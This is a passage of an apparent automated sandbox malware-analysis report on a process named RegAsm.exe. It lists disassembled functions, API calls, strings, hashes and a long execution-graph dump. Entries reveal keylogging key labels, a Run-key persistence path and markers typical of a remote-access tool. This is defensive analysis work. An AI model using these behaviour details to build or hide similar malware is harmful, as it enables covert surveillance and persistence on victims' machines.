                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: !D@$open
                                          • API String ID: 587946157-1586967515
                                          • Opcode ID: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                          • Opcode Fuzzy Hash: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                          Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State
                                          • String ID: [CtrlL]$[CtrlR]
                                          • API String ID: 1649606143-2446555240
                                          • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                          • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                          Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: ,kG$0kG
                                          • API String ID: 1881088180-2015055088
                                          • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                          • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                          • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                          • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                          Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                          Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteDirectoryFileRemove
                                          • String ID: pth_unenc
                                          • API String ID: 3325800564-4028850238
                                          • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                          • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                          Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectProcessSingleTerminateWait
                                          • String ID: pth_unenc
                                          • API String ID: 1872346434-4028850238
                                          • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                          • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                          • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                          • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                          Function 0041BB77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                          • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountInfoInputLastTick
                                          • String ID: NG
                                          • API String ID: 3478931382-1651712548
                                          • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                          • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                          • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                          • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                          Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                          • GetLastError.KERNEL32 ref: 00440D85
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                          Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                          • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                          Execution Graph

                                          Execution Coverage:5.9%
                                          Dynamic/Decrypted Code Coverage:9.2%
                                          Signature Coverage:0%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:67
                                          execution_graph 37903 44660a 37906 4465e4 37903->37906 37905 446613 37907 4465f3 __dllonexit 37906->37907 37908 4465ed _onexit 37906->37908 37907->37905 37908->37907 40359 441819 40362 430737 40359->40362 40361 441825 40363 430756 40362->40363 40364 43076d 40362->40364 40365 430774 40363->40365 40366 43075f 40363->40366 40364->40361 40376 43034a 40365->40376 40387 4169a7 11 API calls 40366->40387 40369 4307ce 40371 430819 memset 40369->40371 40380 415b2c 40369->40380 40370 43077e 40370->40364 40370->40369 40374 4307fa 40370->40374 40371->40364 40373 4307e9 40373->40364 40373->40371 40388 4169a7 11 API calls 40374->40388 40377 43034e 40376->40377 40379 430359 40376->40379 40389 415c23 memcpy 40377->40389 40379->40370 40381 415b42 40380->40381 40386 415b46 40380->40386 40382 415b94 40381->40382 40384 415b5a 40381->40384 40381->40386 40383 4438b5 10 API calls 40382->40383 40383->40386 40385 415b79 memcpy 40384->40385 40384->40386 40385->40386 40386->40373 40387->40364 40388->40364 40389->40379 37721 442ec6 19 API calls 37898 4152c6 malloc 37899 4152e2 37898->37899 37900 4152ef 37898->37900 37902 416760 11 API calls 37900->37902 37902->37899 37909 4466f4 37928 446904 37909->37928 37911 446700 GetModuleHandleA 37914 446710 __set_app_type __p__fmode __p__commode 37911->37914 37913 4467a4 37915 4467ac __setusermatherr 37913->37915 37916 4467b8 37913->37916 37914->37913 37915->37916 37929 4468f0 _controlfp 37916->37929 37918 4467bd _initterm GetEnvironmentStringsW _initterm 37919 44681e GetStartupInfoW 37918->37919 37920 446810 37918->37920 37922 446866 GetModuleHandleA 37919->37922 37930 41276d 37922->37930 37926 446896 exit 37927 44689d _cexit 37926->37927 37927->37920 37928->37911 37929->37918 37931 41277d 37930->37931 37973 4044a4 LoadLibraryW 37931->37973 37933 412785 37934 412789 37933->37934 37979 414b81 37933->37979 37934->37926 37934->37927 37937 4127c8 37983 412465 memset ??2@YAPAXI 37937->37983 37939 4127ea 37995 40ac21 37939->37995 37944 412813 38013 40dd07 memset 37944->38013 37945 412827 38018 40db69 memset 37945->38018 37948 412822 38040 4125b6 ??3@YAXPAX DeleteObject 37948->38040 37950 40ada2 _wcsicmp 37951 41283d 37950->37951 37951->37948 37954 412863 CoInitialize 37951->37954 38023 41268e 37951->38023 37953 412966 38041 40b1ab free free 37953->38041 38039 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37954->38039 37958 41296f 38042 40b633 37958->38042 37960 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37965 412957 CoUninitialize 37960->37965 37970 4128ca 37960->37970 37965->37948 37966 4128d0 TranslateAcceleratorW 37967 412941 GetMessageW 37966->37967 37966->37970 37967->37965 37967->37966 37968 412909 IsDialogMessageW 37968->37967 37968->37970 37969 4128fd IsDialogMessageW 37969->37967 37969->37968 37970->37966 37970->37968 37970->37969 37971 41292b TranslateMessage DispatchMessageW 37970->37971 37972 41291f IsDialogMessageW 37970->37972 37971->37967 37972->37967 37972->37971 37974 4044f3 37973->37974 37978 4044cf FreeLibrary 37973->37978 37976 404507 MessageBoxW 37974->37976 37977 40451e 37974->37977 37976->37933 37977->37933 37978->37974 37980 414b8a 37979->37980 37981 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37979->37981 38046 40a804 memset 37980->38046 37981->37937 37984 4124e0 37983->37984 37985 412505 ??2@YAPAXI 37984->37985 37986 41251c 37985->37986 37991 412521 37985->37991 38068 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37986->38068 38057 444722 37991->38057 37994 41259b wcscpy 37994->37939 38073 40b1ab free free 37995->38073 37999 40ad4b 38008 40ad76 37999->38008 38097 40a9ce 37999->38097 38000 40a9ce malloc memcpy free free 38001 40ac5c 38000->38001 38001->37999 38001->38000 38003 40ace7 free 38001->38003 38001->38008 38077 40a8d0 38001->38077 38089 4099f4 38001->38089 38003->38001 38007 40a8d0 7 API calls 38007->38008 38074 40aa04 38008->38074 38009 40ada2 38010 40adc9 38009->38010 38011 40adaa 38009->38011 38010->37944 38010->37945 38011->38010 38012 40adb3 _wcsicmp 38011->38012 38012->38010 38012->38011 38102 40dce0 38013->38102 38015 40dd3a GetModuleHandleW 38107 40dba7 38015->38107 38019 40dce0 3 API calls 38018->38019 38020 40db99 38019->38020 38179 40dae1 38020->38179 38193 402f3a 38023->38193 38025 412766 38025->37948 38025->37954 38026 4126d3 _wcsicmp 38027 4126a8 38026->38027 38027->38025 38027->38026 38029 41270a 38027->38029 38228 4125f8 7 API calls 38027->38228 38029->38025 38196 411ac5 38029->38196 38039->37960 38040->37953 38041->37958 38043 40b640 38042->38043 38044 40b639 free 38042->38044 38045 40b1ab free free 38043->38045 38044->38043 38045->37934 38047 40a83b GetSystemDirectoryW 38046->38047 38048 40a84c wcscpy 38046->38048 38047->38048 38053 409719 wcslen 38048->38053 38051 40a881 LoadLibraryW 38052 40a886 38051->38052 38052->37981 38054 409724 38053->38054 38055 409739 wcscat LoadLibraryW 38053->38055 38054->38055 38056 40972c wcscat 38054->38056 38055->38051 38055->38052 38056->38055 38058 444732 38057->38058 38059 444728 DeleteObject 38057->38059 38069 409cc3 38058->38069 38059->38058 38061 412551 38062 4010f9 38061->38062 38063 401130 38062->38063 38064 401134 GetModuleHandleW LoadIconW 38063->38064 38065 401107 wcsncat 38063->38065 38066 40a7be 38064->38066 38065->38063 38067 40a7d2 38066->38067 38067->37994 38067->38067 38068->37991 38072 409bfd memset wcscpy 38069->38072 38071 409cdb CreateFontIndirectW 38071->38061 38072->38071 38073->38001 38075 40aa14 38074->38075 38076 40aa0a free 38074->38076 38075->38009 38076->38075 38078 40a8eb 38077->38078 38079 40a8df wcslen 38077->38079 38080 40a906 free 38078->38080 38081 40a90f 38078->38081 38079->38078 38085 40a919 38080->38085 38082 4099f4 3 API calls 38081->38082 38082->38085 38083 40a932 38087 4099f4 3 API calls 38083->38087 38084 40a929 free 38086 40a93e memcpy 38084->38086 38085->38083 38085->38084 38086->38001 38088 40a93d 38087->38088 38088->38086 38090 409a41 38089->38090 38091 4099fb malloc 38089->38091 38090->38001 38093 409a37 38091->38093 38094 409a1c 38091->38094 38093->38001 38095 409a30 free 38094->38095 38096 409a20 memcpy 38094->38096 38095->38093 38096->38095 38098 40a9e7 38097->38098 38099 40a9dc free 38097->38099 38101 4099f4 3 API calls 38098->38101 38100 40a9f2 38099->38100 38100->38007 38101->38100 38126 409bca GetModuleFileNameW 38102->38126 38104 40dce6 wcsrchr 38105 40dcf5 38104->38105 38106 40dcf9 wcscat 38104->38106 38105->38106 38106->38015 38127 44db70 38107->38127 38111 40dbfd 38130 4447d9 38111->38130 38114 40dc34 wcscpy wcscpy 38156 40d6f5 38114->38156 38115 40dc1f wcscpy 38115->38114 38118 40d6f5 3 API calls 38119 40dc73 38118->38119 38120 40d6f5 3 API calls 38119->38120 38121 40dc89 38120->38121 38122 40d6f5 3 API calls 38121->38122 38123 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38122->38123 38162 40da80 38123->38162 38126->38104 38128 40dbb4 memset memset 38127->38128 38129 409bca GetModuleFileNameW 38128->38129 38129->38111 38132 4447f4 38130->38132 38131 40dc1b 38131->38114 38131->38115 38132->38131 38133 444807 ??2@YAPAXI 38132->38133 38134 44481f 38133->38134 38135 444873 _snwprintf 38134->38135 38136 4448ab wcscpy 38134->38136 38169 44474a 8 API calls 38135->38169 38138 4448bb 38136->38138 38170 44474a 8 API calls 38138->38170 38139 4448a7 38139->38136 38139->38138 38141 4448cd 38171 44474a 8 API calls 38141->38171 38143 4448e2 38172 44474a 8 API calls 38143->38172 38145 4448f7 38173 44474a 8 API calls 38145->38173 38147 44490c 38174 44474a 8 API calls 38147->38174 38149 444921 38175 44474a 8 API calls 38149->38175 38151 444936 38176 44474a 8 API calls 38151->38176 38153 44494b 38177 44474a 8 API calls 38153->38177 38155 444960 ??3@YAXPAX 38155->38131 38157 44db70 38156->38157 38158 40d702 memset GetPrivateProfileStringW 38157->38158 38159 40d752 38158->38159 38160 40d75c WritePrivateProfileStringW 38158->38160 38159->38160 38161 40d758 38159->38161 38160->38161 38161->38118 38163 44db70 38162->38163 38164 40da8d memset 38163->38164 38165 40daac LoadStringW 38164->38165 38166 40dac6 38165->38166 38166->38165 38168 40dade 38166->38168 38178 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38166->38178 38168->37948 38169->38139 38170->38141 38171->38143 38172->38145 38173->38147 38174->38149 38175->38151 38176->38153 38177->38155 38178->38166 38189 409b98 GetFileAttributesW 38179->38189 38181 40daea 38182 40daef wcscpy wcscpy GetPrivateProfileIntW 38181->38182 38188 40db63 38181->38188 38190 40d65d GetPrivateProfileStringW 38182->38190 38184 40db3e 38191 40d65d GetPrivateProfileStringW 38184->38191 38186 40db4f 38192 40d65d GetPrivateProfileStringW 38186->38192 38188->37950 38189->38181 38190->38184 38191->38186 38192->38188 38229 40eaff 38193->38229 38197 411ae2 memset 38196->38197 38198 411b8f 38196->38198 38270 409bca GetModuleFileNameW 38197->38270 38210 411a8b 38198->38210 38200 411b0a wcsrchr 38201 411b22 wcscat 38200->38201 38202 411b1f 38200->38202 38271 414770 wcscpy wcscpy wcscpy CloseHandle 38201->38271 38202->38201 38204 411b67 38272 402afb 38204->38272 38208 411b7f 38328 40ea13 SendMessageW memset SendMessageW 38208->38328 38211 402afb 27 API calls 38210->38211 38212 411ac0 38211->38212 38213 4110dc 38212->38213 38214 41113e 38213->38214 38219 4110f0 38213->38219 38353 40969c LoadCursorW SetCursor 38214->38353 38216 411143 38227 40b04b ??3@YAXPAX 38216->38227 38354 444a54 38216->38354 38357 4032b4 38216->38357 38217 4110f7 _wcsicmp 38217->38219 38218 411157 38220 40ada2 _wcsicmp 38218->38220 38219->38214 38219->38217 38375 410c46 10 API calls 38219->38375 38223 411167 38220->38223 38221 4111af 38223->38221 38224 4111a6 qsort 38223->38224 38224->38221 38227->38218 38228->38027 38230 40eb10 38229->38230 38243 40e8e0 38230->38243 38233 40eb6c memcpy memcpy 38234 40ebe1 38233->38234 38235 40ebb7 38233->38235 38234->38233 38236 40ebf2 ??2@YAPAXI ??2@YAPAXI 38234->38236 38235->38234 38237 40d134 16 API calls 38235->38237 38238 40ec2e ??2@YAPAXI 38236->38238 38241 40ec65 38236->38241 38237->38235 38238->38241 38253 40ea7f 38241->38253 38242 402f49 38242->38027 38244 40e8f2 38243->38244 38245 40e8eb ??3@YAXPAX 38243->38245 38246 40e900 38244->38246 38247 40e8f9 ??3@YAXPAX 38244->38247 38245->38244 38248 40e911 38246->38248 38249 40e90a ??3@YAXPAX 38246->38249 38247->38246 38250 40e931 ??2@YAPAXI ??2@YAPAXI 38248->38250 38251 40e921 ??3@YAXPAX 38248->38251 38252 40e92a ??3@YAXPAX 38248->38252 38249->38248 38250->38233 38251->38252 38252->38250 38254 40aa04 free 38253->38254 38255 40ea88 38254->38255 38256 40aa04 free 38255->38256 38257 40ea90 38256->38257 38258 40aa04 free 38257->38258 38259 40ea98 38258->38259 38260 40aa04 free 38259->38260 38261 40eaa0 38260->38261 38262 40a9ce 4 API calls 38261->38262 38263 40eab3 38262->38263 38264 40a9ce 4 API calls 38263->38264 38265 40eabd 38264->38265 38266 40a9ce 4 API calls 38265->38266 38267 40eac7 38266->38267 38268 40a9ce 4 API calls 38267->38268 38269 40ead1 38268->38269 38269->38242 38270->38200 38271->38204 38329 40b2cc 38272->38329 38274 402b0a 38275 40b2cc 27 API calls 38274->38275 38276 402b23 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402b3a 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402b54 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402b6b 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402b82 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402b99 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402bb0 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402bc7 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402bde 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402bf5 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402c0c 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402c23 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402c3a 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402c51 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402c68 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402c7f 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402c99 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402cb3 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402cd5 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402cf0 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402d0b 38315->38316 38317 40b2cc 27 API calls 38316->38317 38318 402d26 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402d3e 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402d59 38321->38322 38323 40b2cc 27 API calls 38322->38323 38324 402d78 38323->38324 38325 40b2cc 27 API calls 38324->38325 38326 402d93 38325->38326 38327 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38326->38327 38327->38208 38328->38198 38332 40b58d 38329->38332 38331 40b2d1 38331->38274 38333 40b5a4 GetModuleHandleW FindResourceW 38332->38333 38334 40b62e 38332->38334 38335 40b5c2 LoadResource 38333->38335 38337 40b5e7 38333->38337 38334->38331 38336 40b5d0 SizeofResource LockResource 38335->38336 38335->38337 38336->38337 38337->38334 38345 40afcf 38337->38345 38339 40b608 memcpy 38348 40b4d3 memcpy 38339->38348 38341 40b61e 38349 40b3c1 18 API calls 38341->38349 38343 40b626 38350 40b04b 38343->38350 38346 40b04b ??3@YAXPAX 38345->38346 38347 40afd7 ??2@YAPAXI 38346->38347 38347->38339 38348->38341 38349->38343 38351 40b051 ??3@YAXPAX 38350->38351 38352 40b05f 38350->38352 38351->38352 38352->38334 38353->38216 38355 444a64 FreeLibrary 38354->38355 38356 444a83 38354->38356 38355->38356 38356->38218 38358 4032c4 38357->38358 38359 40b633 free 38358->38359 38360 403316 38359->38360 38376 44553b 38360->38376 38364 403480 38574 40368c 15 API calls 38364->38574 38366 403489 38367 40b633 free 38366->38367 38369 403495 38367->38369 38368 40333c 38368->38364 38370 4033a9 memset memcpy 38368->38370 38371 4033ec wcscmp 38368->38371 38572 4028e7 11 API calls 38368->38572 38573 40f508 6 API calls 38368->38573 38369->38218 38370->38368 38370->38371 38371->38368 38373 403421 _wcsicmp 38373->38368 38375->38219 38377 445548 38376->38377 38378 445599 38377->38378 38575 40c768 38377->38575 38379 4455a8 memset 38378->38379 38521 4457f2 38378->38521 38659 403988 38379->38659 38385 4455e5 38394 445672 38385->38394 38404 44560f 38385->38404 38387 4458bb memset memset 38391 414c2e 16 API calls 38387->38391 38389 4459ed 38395 445a00 memset memset 38389->38395 38396 445b22 38389->38396 38390 44595e memset memset 38397 414c2e 16 API calls 38390->38397 38398 4458f9 38391->38398 38392 44557a 38399 44558c 38392->38399 38639 4136c0 38392->38639 38670 403fbe memset memset memset memset memset 38394->38670 38401 414c2e 16 API calls 38395->38401 38406 445bca 38396->38406 38407 445b38 memset memset memset 38396->38407 38402 44599c 38397->38402 38403 40b2cc 27 API calls 38398->38403 38643 444b06 38399->38643 38411 445a3e 38401->38411 38413 40b2cc 27 API calls 38402->38413 38414 445909 38403->38414 38416 4087b3 335 API calls 38404->38416 38415 445c8b memset memset 38406->38415 38472 445cf0 38406->38472 38419 445bd4 38407->38419 38420 445b98 38407->38420 38408 445849 38853 40b1ab free free 38408->38853 38421 40b2cc 27 API calls 38411->38421 38429 4459ac 38413->38429 38425 409d1f 6 API calls 38414->38425 38430 414c2e 16 API calls 38415->38430 38426 445621 38416->38426 38418 44589f 38854 40b1ab free free 38418->38854 38808 414c2e 38419->38808 38420->38419 38432 445ba2 38420->38432 38434 445a4f 38421->38434 38424 403335 38571 4452e5 43 API calls 38424->38571 38440 445919 38425->38440 38839 4454bf 20 API calls 38426->38839 38427 445823 38427->38408 38449 4087b3 335 API calls 38427->38449 38428 445854 38435 4458aa 38428->38435 38785 403c9c memset memset memset memset memset 38428->38785 38441 409d1f 6 API calls 38429->38441 38442 445cc9 38430->38442 38944 4099c6 wcslen 38432->38944 38433 4456b2 38841 40b1ab free free 38433->38841 38446 409d1f 6 API calls 38434->38446 38435->38387 38468 44594a 38435->38468 38438 445d3d 38467 40b2cc 27 API calls 38438->38467 38439 445d88 memset memset memset 38450 414c2e 16 API calls 38439->38450 38855 409b98 GetFileAttributesW 38440->38855 38451 4459bc 38441->38451 38452 409d1f 6 API calls 38442->38452 38443 445879 38443->38418 38462 4087b3 335 API calls 38443->38462 38445 445680 38445->38433 38693 4087b3 memset 38445->38693 38455 445a63 38446->38455 38447 40b2cc 27 API calls 38456 445bf3 38447->38456 38449->38427 38459 445dde 38450->38459 38920 409b98 GetFileAttributesW 38451->38920 38461 445ce1 38452->38461 38453 445bb3 38947 445403 memset 38453->38947 38465 40b2cc 27 API calls 38455->38465 38824 409d1f wcslen wcslen 38456->38824 38457 445928 38457->38468 38856 40b6ef 38457->38856 38469 40b2cc 27 API calls 38459->38469 38964 409b98 